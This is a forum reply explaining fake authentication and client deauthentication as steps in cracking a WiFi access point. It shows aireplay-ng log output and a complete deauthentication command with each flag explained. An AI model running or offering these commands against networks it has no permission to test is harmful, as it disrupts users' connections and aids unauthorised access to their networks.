View Single Post
Posts: 102 | Thanked: 23 times | Joined on Nov 2009 @ Finland
#592
Originally Posted by dattadude View Post
when n where do i use this code??

thks
Fake authentication is used when u cant get succesful authentication/association request from AP when you press authenticate button from faircrack, succesful:
Code:
18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)
.. Is there any traffic on the AP you are trying to crack? I have my self one AP i tried to crack with no
result as there was absolutely no traffic. If there is a client connected to the AP, you can try to deauthenticate the current client. This also is a good method for getting ARP's, but only works if you have client connected!

deauthenticate:

Code:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D wlan0
Where:

* -0 means deauthentication
* 1 is the number of deauths to send (you can send multiple if you wish)
* -a 00:14:6C:7E:40:80 is the MAC address of the access point
* -c 000:0F:B5:AE:CE:9D is the MAC address of the client you are deauthing
* wlan0 is the interface name

!!!You should really read this!!!